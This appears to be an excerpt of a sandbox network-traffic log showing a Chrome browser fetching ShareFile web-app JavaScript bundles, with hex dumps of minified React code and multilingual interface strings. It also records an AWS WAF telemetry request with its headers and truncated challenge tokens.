                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC15772INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 6f 63 67 65 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 5f 5f 57 45 42 50 41 43 4b 5f 44 59 4e 41 4d 49 43 5f 45 58 50 4f 52 54 5f 5f 2c 5f 5f 73 79 73 74 65 6d 5f 63 6f 6e 74 65 78 74 5f 5f 29 7b 76 61 72 20 5f 5f 57 45 42 50 41 43 4b 5f 45 58 54 45 52 4e 41 4c 5f 4d
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdocgenpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(__WEBPACK_DYNAMIC_EXPORT__,__system_context__){var __WEBPACK_EXTERNAL_M
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 22 23 37 66 39 65 66 33 22 2c 22 23 61 38 63 31 66 38 22 2c 22 23 64 32 65 30 66 61 22 5d 3b 51 2e 70 72 69 6d 61 72 79 3d 51 5b 35 5d 3b 76 61 72 20 4a 3d 5b 22 23 31 61 31 33 32 35 22 2c 22 23 32 34 31 36 33 61 22 2c 22 23 33 30 31 63 34 64 22 2c 22 23 33 65 32 30 36 39 22 2c 22 23 35 31 32 35 38 66 22 2c 22 23 36 34 32 61 62 35 22 2c 22 23 38 35 34 65 63 61 22 2c 22 23 61 62 37 61 65 30 22 2c 22 23 63 64 61 38 66 30 22 2c 22 23 65 62 64 37 66 61 22 5d 3b 4a 2e 70 72 69 6d 61 72 79 3d 4a 5b 35 5d 3b 76 61 72 20 65 65 3d 5b 22 23 32 39 31 33 32 31 22 2c 22 23 34 30 31 36 32 66 22 2c 22 23 35 35 31 63 33 62 22 2c 22 23 37 35 32 30 34 66 22 2c 22 23 61 30 32 36 36 39 22 2c 22 23 63 62 32 62 38 33 22 2c 22 23 65 30 35 32 39 63 22 2c 22 23 66 33 37 66 62 37
                                                                                                                                                                                                                                                                                Data Ascii: "#7f9ef3","#a8c1f8","#d2e0fa"];Q.primary=Q[5];var J=["#1a1325","#24163a","#301c4d","#3e2069","#51258f","#642ab5","#854eca","#ab7ae0","#cda8f0","#ebd7fa"];J.primary=J[5];var ee=["#291321","#40162f","#551c3b","#75204f","#a02669","#cb2b83","#e0529c","#f37fb7
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 6c 69 63 68 2e 20 57 c3 a4 68 6c 65 6e 20 53 69 65 20 65 69 6e 65 6e 20 61 6e 64 65 72 65 6e 20 4f 72 64 6e 65 72 20 6f 64 65 72 20 55 6e 74 65 72 6f 72 64 6e 65 72 2e 22 2c 6d 6f 76 65 3a 22 56 65 72 73 63 68 69 65 62 65 6e 22 2c 6d 6f 76 65 5f 74 61 72 67 65 74 5f 6e 6f 74 5f 61 6c 6c 6f 77 65 64 3a 22 44 61 73 20 61 75 73 67 65 77 c3 a4 68 6c 74 65 20 45 6c 65 6d 65 6e 74 20 6b 61 6e 6e 20 6e 69 63 68 74 20 69 6e 20 64 69 65 73 65 6e 20 4f 72 64 6e 65 72 20 76 65 72 73 63 68 6f 62 65 6e 20 77 65 72 64 65 6e 2e 20 57 c3 a4 68 6c 65 6e 20 53 69 65 20 65 69 6e 65 6e 20 61 6e 64 65 72 65 6e 20 4f 72 64 6e 65 72 2e 22 2c 6d 6f 76 69 6e 67 5f 69 74 65 6d 5f 74 6f 3a 22 56 65 72 73 63 68 69 65 62 65 6e 20 76 6f 6e 20 27 7b 7b 66 69 6c 65 4e 61 6d 65 7d 7d 27
                                                                                                                                                                                                                                                                                Data Ascii: lich. Whlen Sie einen anderen Ordner oder Unterordner.",move:"Verschieben",move_target_not_allowed:"Das ausgewhlte Element kann nicht in diesen Ordner verschoben werden. Whlen Sie einen anderen Ordner.",moving_item_to:"Verschieben von '{{fileName}}'
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC15844INData Raw: 5f 64 6f 77 6e 6c 6f 61 64 5f 77 61 74 65 72 6d 61 72 6b 3a 22 4d 69 74 61 72 62 65 69 74 65 72 20 6b c3 b6 6e 6e 65 6e 20 6e 61 63 68 20 64 65 72 20 41 6e 6d 65 6c 64 75 6e 67 20 65 69 6e 65 20 4b 6f 70 69 65 20 6d 69 74 20 57 61 73 73 65 72 7a 65 69 63 68 65 6e 20 68 65 72 75 6e 74 65 72 6c 61 64 65 6e 2e 22 2c 76 69 65 77 5f 6f 6e 6c 79 3a 22 4d 69 74 61 72 62 65 69 74 65 72 20 6b c3 b6 6e 6e 65 6e 20 6e 61 63 68 20 64 65 72 20 41 6e 6d 65 6c 64 75 6e 67 20 61 6e 7a 65 69 67 65 6e 2e 22 2c 76 69 65 77 5f 77 61 74 65 72 6d 61 72 6b 3a 22 4d 69 74 61 72 62 65 69 74 65 72 20 6b c3 b6 6e 6e 65 6e 20 6e 61 63 68 20 64 65 72 20 41 6e 6d 65 6c 64 75 6e 67 20 65 69 6e 65 20 4b 6f 70 69 65 20 6d 69 74 20 57 61 73 73 65 72 7a 65 69 63 68 65 6e 20 61 6e 7a 65 69
                                                                                                                                                                                                                                                                                Data Ascii: _download_watermark:"Mitarbeiter knnen nach der Anmeldung eine Kopie mit Wasserzeichen herunterladen.",view_only:"Mitarbeiter knnen nach der Anmeldung anzeigen.",view_watermark:"Mitarbeiter knnen nach der Anmeldung eine Kopie mit Wasserzeichen anzei
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC12792INData Raw: 20 70 72 65 76 65 6e 74 73 20 75 73 65 72 73 20 66 72 6f 6d 20 64 6f 77 6e 6c 6f 61 64 69 6e 67 20 74 68 65 20 66 69 6c 65 2e 20 53 6f 6d 65 20 66 69 6c 65 20 74 79 70 65 73 20 64 6f 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 76 69 65 77 2d 6f 6e 6c 79 20 73 68 61 72 69 6e 67 20 6f 72 20 77 61 74 65 72 6d 61 72 6b 69 6e 67 2e 22 2c 74 6f 6f 6c 74 69 70 5f 61 62 6f 75 74 5f 76 69 65 77 5f 6f 6e 6c 79 5f 6c 69 6e 6b 3a 22 41 62 6f 75 74 20 76 69 65 77 2d 6f 6e 6c 79 20 73 68 61 72 69 6e 67 22 2c 74 6f 6f 6c 74 69 70 5f 61 62 6f 75 74 5f 77 61 74 65 72 6d 61 72 6b 69 6e 67 5f 6c 69 6e 6b 3a 22 41 62 6f 75 74 20 77 61 74 65 72 6d 61 72 6b 69 6e 67 22 7d 2c 64 6f 77 6e 6c 6f 61 64 73 5f 6c 69 6d 69 74 73 3a 7b 75 6e 6c 69 6d 69 74 65 64 3a 22 55 6e 6c 69 6d 69 74
                                                                                                                                                                                                                                                                                Data Ascii: prevents users from downloading the file. Some file types do not support view-only sharing or watermarking.",tooltip_about_view_only_link:"About view-only sharing",tooltip_about_watermarking_link:"About watermarking"},downloads_limits:{unlimited:"Unlimit
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 6e 74 c3 a9 6e 74 65 6c 6f 20 65 6e 20 75 6e 61 20 63 61 72 70 65 74 61 20 64 69 66 65 72 65 6e 74 65 2e 22 2c 63 6f 70 79 69 6e 67 5f 69 74 65 6d 5f 74 6f 3a 27 43 6f 70 69 61 6e 64 6f 20 22 7b 7b 66 69 6c 65 4e 61 6d 65 7d 7d 22 20 65 6e 20 7b 7b 64 65 73 74 69 6e 61 74 69 6f 6e 46 6f 6c 64 65 72 7d 7d 27 2c 63 6f 70 79 69 6e 67 5f 69 74 65 6d 5f 74 6f 5f 70 6c 75 72 61 6c 3a 22 43 6f 70 69 61 6e 64 6f 20 7b 7b 63 6f 75 6e 74 7d 7d 20 65 6c 65 6d 65 6e 74 6f 73 20 65 6e 20 7b 7b 64 65 73 74 69 6e 61 74 69 6f 6e 46 6f 6c 64 65 72 7d 7d 22 2c 6e 65 65 64 5f 70 65 72 6d 69 73 73 69 6f 6e 3a 22 53 65 20 6e 65 63 65 73 69 74 61 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 63 6f 70 69 61 72 20 61 71 75 c3 ad 2e 20 49 6e 74 c3 a9 6e 74 65 6c 6f 20 65 6e 20 75 6e
                                                                                                                                                                                                                                                                                Data Ascii: ntntelo en una carpeta diferente.",copying_item_to:'Copiando "{{fileName}}" en {{destinationFolder}}',copying_item_to_plural:"Copiando {{count}} elementos en {{destinationFolder}}",need_permission:"Se necesita permiso para copiar aqu. Intntelo en un
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC9200INData Raw: 65 72 74 61 20 6c 61 20 76 65 6e 74 61 6e 61 2e 22 2c 75 70 6c 6f 61 64 5f 74 68 65 6e 5f 73 65 6e 64 3a 22 43 61 72 67 61 6e 64 6f 20 79 20 65 6e 76 69 61 6e 64 6f 20 73 75 20 61 72 63 68 69 76 6f 2e 20 4d 61 6e 74 65 6e 67 61 20 61 62 69 65 72 74 61 20 6c 61 20 76 65 6e 74 61 6e 61 2e 22 7d 2c 72 65 6d 65 6d 62 65 72 5f 6d 65 73 73 61 67 65 3a 22 52 65 63 6f 72 64 61 72 20 61 73 75 6e 74 6f 20 79 20 6d 65 6e 73 61 6a 65 22 2c 72 65 71 75 65 73 74 3a 22 53 6f 6c 69 63 69 74 75 64 22 2c 72 65 71 75 65 73 74 5f 66 69 6c 65 73 3a 22 53 6f 6c 69 63 69 74 61 72 20 61 72 63 68 69 76 6f 73 22 2c 72 65 71 75 69 72 65 64 3a 22 2a 20 52 65 71 75 65 72 69 64 6f 22 2c 73 65 6e 64 3a 22 45 6e 76 69 61 72 22 2c 73 65 6e 64 5f 74 6f 5f 73 70 65 63 69 66 69 63 5f 70 65
                                                                                                                                                                                                                                                                                Data Ascii: erta la ventana.",upload_then_send:"Cargando y enviando su archivo. Mantenga abierta la ventana."},remember_message:"Recordar asunto y mensaje",request:"Solicitud",request_files:"Solicitar archivos",required:"* Requerido",send:"Enviar",send_to_specific_pe
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 2c 63 6f 6e 74 61 63 74 53 65 6c 65 63 74 3a 7b 63 6c 65 61 72 56 61 6c 75 65 3a 22 45 66 66 61 63 65 72 20 76 61 6c 65 75 72 22 2c 6e 6f 52 65 73 75 6c 74 73 3a 22 41 75 63 75 6e 20 72 c3 a9 73 75 6c 74 61 74 20 74 72 6f 75 76 c3 a9 22 2c 73 65 61 72 63 68 69 6e 67 3a 22 52 65 63 68 65 72 63 68 65 2e 2e 2e 22 2c 73 65 6c 65 63 74 3a 22 53 c3 a9 6c 65 63 74 69 6f 6e 6e 65 72 2e 2e 2e 22 2c 73 74 61 72 74 5f 74 79 70 69 6e 67 3a 22 43 6f 6d 6d 65 6e 63 65 7a 20 c3 a0 20 74 61 70 65 72 20 70 6f 75 72 20 74 72 6f 75 76 65 72 20 64 65 73 20 75 74 69 6c 69 73 61 74 65 75 72 73 22 7d 2c 63 6f 6e 74 61 63 74 5f 74 69 74 6c 65 3a 22 7b 7b 6e 61 6d 65 7d 7d 20 28 7b 7b 65 6d 61 69 6c 7d 7d 29 22 2c 22 63 6f 6e 74 69 6e 75 65 22 3a 22 43 6f 6e 74 69 6e 75 65 72 22
                                                                                                                                                                                                                                                                                Data Ascii: ,contactSelect:{clearValue:"Effacer valeur",noResults:"Aucun rsultat trouv",searching:"Recherche...",select:"Slectionner...",start_typing:"Commencez taper pour trouver des utilisateurs"},contact_title:"{{name}} ({{email}})","continue":"Continuer"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC9200INData Raw: 65 63 20 63 65 20 6c 69 65 6e 20 70 65 75 76 65 6e 74 20 6c 65 20 63 6f 6e 73 75 6c 74 65 72 20 65 6e 20 6c 69 67 6e 65 20 61 76 65 63 20 75 6e 20 66 69 6c 69 67 72 61 6e 65 20 61 70 72 c3 a8 73 20 73 27 c3 aa 74 72 65 20 63 6f 6e 6e 65 63 74 c3 a9 73 2e 22 7d 2c 72 65 71 75 69 72 65 5f 75 73 65 72 5f 69 6e 66 6f 3a 7b 76 69 65 77 5f 64 6f 77 6e 6c 6f 61 64 3a 22 54 6f 75 74 65 20 70 65 72 73 6f 6e 6e 65 20 64 69 73 70 6f 73 61 6e 74 20 64 65 20 63 65 20 6c 69 65 6e 20 70 65 75 74 20 6c 65 20 63 6f 6e 73 75 6c 74 65 72 20 65 74 20 6c 65 20 74 c3 a9 6c c3 a9 63 68 61 72 67 65 72 20 61 70 72 c3 a8 73 20 61 76 6f 69 72 20 65 6e 74 72 c3 a9 20 73 6f 6e 20 6e 6f 6d 20 65 74 20 65 2d 6d 61 69 6c 2e 22 2c 76 69 65 77 5f 64 6f 77 6e 6c 6f 61 64 5f 77 61 74 65 72
                                                                                                                                                                                                                                                                                Data Ascii: ec ce lien peuvent le consulter en ligne avec un filigrane aprs s'tre connects."},require_user_info:{view_download:"Toute personne disposant de ce lien peut le consulter et le tlcharger aprs avoir entr son nom et e-mail.",view_download_water
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC1576INData Raw: 69 22 2c 6e 61 6d 65 3a 22 4e 6f 6d 65 22 2c 6e 6f 5f 63 6f 6e 74 61 63 74 3a 22 4e 65 73 73 75 6e 20 63 6f 6e 74 61 74 74 6f 20 63 6f 72 72 69 73 70 6f 6e 64 65 20 61 6c 6c 61 20 72 69 63 65 72 63 61 22 2c 70 65 72 73 6f 6e 61 6c 3a 22 52 75 62 72 69 63 61 20 70 65 72 73 6f 6e 61 6c 65 22 2c 73 68 61 72 65 64 3a 22 52 75 62 72 69 63 61 20 63 6f 6e 64 69 76 69 73 61 22 7d 2c 63 61 6e 63 65 6c 3a 22 41 6e 6e 75 6c 6c 61 22 2c 63 61 75 74 69 6f 6e 3a 22 41 74 74 65 6e 7a 69 6f 6e 65 22 2c 63 68 65 63 6b 6f 75 74 3a 7b 61 62 6f 75 74 5f 74 6f 5f 63 68 65 63 6b 5f 6f 75 74 5f 65 78 70 69 72 65 5f 6d 65 73 73 61 67 65 3a 22 49 6c 20 66 69 6c 65 20 65 73 74 72 61 74 74 6f 20 73 63 61 64 72 c3 a0 20 74 72 61 20 32 34 20 6f 72 65 2e 20 41 6c 74 72 69 20 75 74 65
                                                                                                                                                                                                                                                                                Data Ascii: i",name:"Nome",no_contact:"Nessun contatto corrisponde alla ricerca",personal:"Rubrica personale",shared:"Rubrica condivisa"},cancel:"Annulla",caution:"Attenzione",checkout:{about_to_check_out_expire_message:"Il file estratto scadr tra 24 ore. Altri ute


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                51192.168.2.64977618.173.205.914432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC647OUTPOST /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                                                                                Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Content-Length: 1255
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC1255OUTData Raw: 7b 22 65 78 69 73 74 69 6e 67 5f 74 6f 6b 65 6e 22 3a 22 65 39 36 61 32 61 31 36 2d 37 65 33 63 2d 34 62 39 39 2d 39 36 65 32 2d 66 34 35 61 62 37 36 62 32 38 38 35 3a 45 51 6f 41 76 48 56 2b 59 43 4b 79 41 41 41 41 3a 77 67 6b 31 61 5a 72 46 4d 77 6d 72 65 46 68 44 45 7a 57 67 6d 5a 74 42 75 6d 68 76 2b 56 2b 72 70 30 4d 41 38 66 57 46 57 4a 54 77 64 6c 75 43 4e 48 66 62 57 4f 39 74 42 6a 6a 65 63 64 4b 6d 75 45 77 50 74 74 37 78 62 2f 48 4f 47 7a 50 6e 46 6f 74 4f 54 65 2f 32 62 45 71 46 4b 45 38 4a 47 75 72 51 4b 65 6d 70 73 48 4d 71 4b 38 43 38 68 30 4c 43 4d 4f 2f 32 4d 43 33 6e 43 65 4f 71 56 73 73 6c 4b 74 6b 6d 79 66 64 4d 56 41 66 43 79 79 39 66 36 6c 75 42 31 45 30 33 4c 39 30 35 6f 71 4e 36 37 79 69 67 72 68 65 55 2b 33 59 32 31 34 36 32 59 77
                                                                                                                                                                                                                                                                                Data Ascii: {"existing_token":"e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAvHV+YCKyAAAA:wgk1aZrFMwmreFhDEzWgmZtBumhv+V+rp0MA8fWFWJTwdluCNHfbWO9tBjjecdKmuEwPtt7xb/HOGzPnFotOTe/2bEqFKE8JGurQKempsHMqK8C8h0LCMO/2MC3nCeOqVsslKtkmyfdMVAfCyy9f6luB1E03L905oqN67yigrheU+3Y21462Yw
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                Content-Length: 852
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:14 GMT
                                                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS,GET,POST
                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                expires: 0
                                                                                                                                                                                                                                                                                x-amzn-waf-challenge-id: Root=1-6706c5da-34347abc52a4e442009b450c
                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 506bffda4b1949c4425629ce0bdce052.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P12
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: rAPiSZa5hRqErhT0WywsfYtU-gikYUsIAahcdtp0BFRs9IsmYgDJ_g==
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC852INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 65 39 36 61 32 61 31 36 2d 37 65 33 63 2d 34 62 39 39 2d 39 36 65 32 2d 66 34 35 61 62 37 36 62 32 38 38 35 3a 45 51 6f 41 6a 63 31 2b 71 74 4a 70 41 41 41 41 3a 70 46 62 33 6c 46 6c 61 59 76 41 2b 58 59 4e 4f 7a 69 45 76 66 70 6c 76 2f 54 39 74 6d 57 47 62 5a 58 57 4b 6d 54 68 31 5a 41 30 71 58 79 34 4f 75 68 4e 39 31 71 2f 41 34 65 6c 37 41 6e 74 77 57 49 73 6e 59 47 39 79 2b 76 64 43 6e 4e 6d 6f 4a 44 55 73 43 37 56 6d 52 44 76 4d 62 54 63 61 49 6f 38 41 4a 38 79 54 31 48 76 41 4a 77 74 57 4b 34 33 57 47 54 73 46 64 2f 69 35 7a 6b 50 6b 7a 4f 54 62 2f 53 49 33 48 2b 35 4a 55 36 5a 63 74 4b 71 54 45 38 6b 53 46 39 58 38 37 51 77 51 46 44 63 5a 63 63 4e 73 59 76 55 47 33 36 7a 75 2f 54 4d 65 79 4a 78 68 74 57 69 73 6f 41 32
                                                                                                                                                                                                                                                                                Data Ascii: {"token":"e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAjc1+qtJpAAAA:pFb3lFlaYvA+XYNOziEvfplv/T9tmWGbZXWKmTh1ZA0qXy4OuhN91q/A4el7AntwWIsnYG9y+vdCnNmoJDUsC7VmRDvMbTcaIo8AJ8yT1HvAJwtWK43WGTsFd/i5zkPkzOTb/SI3H+5JU6ZctKqTE8kSF9X87QwQFDcZccNsYvUG36zu/TMeyJxhtWisoA2


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                52192.168.2.64977713.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC423OUTGET /sharefile-web/sharefiledev-workflows-pilet/0.119.14/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC550INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 1420749
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 02 Oct 2024 19:19:48 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "1d059a1e91899cad205e8515bea97d44"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 f7bf326347bdd7f275a38a22b5b83724.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Kc4KgU4zAFz-LGN1O9PyoND54gYnqagSobskR92wWrmyivxvgNZigg==
                                                                                                                                                                                                                                                                                Age: 45973
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 77 6f 72 6b 66 6c 6f 77 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 2c 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 6c 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevworkflowspilet,{})System.register(["react","antd","react-dom","tslib","@citrite/sf-api","react-router-dom","@sharefiledev/antd-config","react-router"],(function(e,t){var n={},r={},o={},i={},a={},s={},l={},c={};retu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2e 6b 65 79 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 72 65 74 75 72 6e 28 75 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72
                                                                                                                                                                                                                                                                                Data Ascii: ble=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}function c(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}function u(){return(u=Object.assign||function(e){for(var t=1;t<ar
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 2b 22 62 6f 78 2d 22 2b 6c 28 65 2c 22 2d 67 72 6f 77 22 2c 22 22 29 2b 50 2b 65 2b 7a 2b 6c 28 65 2c 22 67 72 6f 77 22 2c 22 70 6f 73 69 74 69 76 65 22 29 2b 65 3b 63 61 73 65 20 34 35 35 34 3a 72 65 74 75 72 6e 20 50 2b 6c 28 65 2c 2f 28 5b 5e 2d 5d 29 28 74 72 61 6e 73 66 6f 72 6d 29 2f 67 2c 22 24 31 22 2b 50 2b 22 24 32 22 29 2b 65 3b 63 61 73 65 20 36 31 38 37 3a 72 65 74 75 72 6e 20 6c 28 6c 28 6c 28 65 2c 2f 28 7a 6f 6f 6d 2d 7c 67 72 61 62 29 2f 2c 50 2b 22 24 31 22 29 2c 2f 28 69 6d 61 67 65 2d 73 65 74 29 2f 2c 50 2b 22 24 31 22 29 2c 65 2c 22 22 29 2b 65 3b 63 61 73 65 20 35 34 39 35 3a 63 61 73 65 20 33 39 35 39 3a 72 65 74 75 72 6e 20 6c 28 65 2c 2f 28 69 6d 61 67 65 2d 73 65 74 5c 28 5b 5e 5d 2a 29 2f 2c 50 2b 22 24 31 24 60 24 31 22 29 3b
                                                                                                                                                                                                                                                                                Data Ascii: +"box-"+l(e,"-grow","")+P+e+z+l(e,"grow","positive")+e;case 4554:return P+l(e,/([^-])(transform)/g,"$1"+P+"$2")+e;case 6187:return l(l(l(e,/(zoom-|grab)/,P+"$1"),/(image-set)/,P+"$1"),e,"")+e;case 5495:case 3959:return l(e,/(image-set\([^]*)/,P+"$1$`$1");
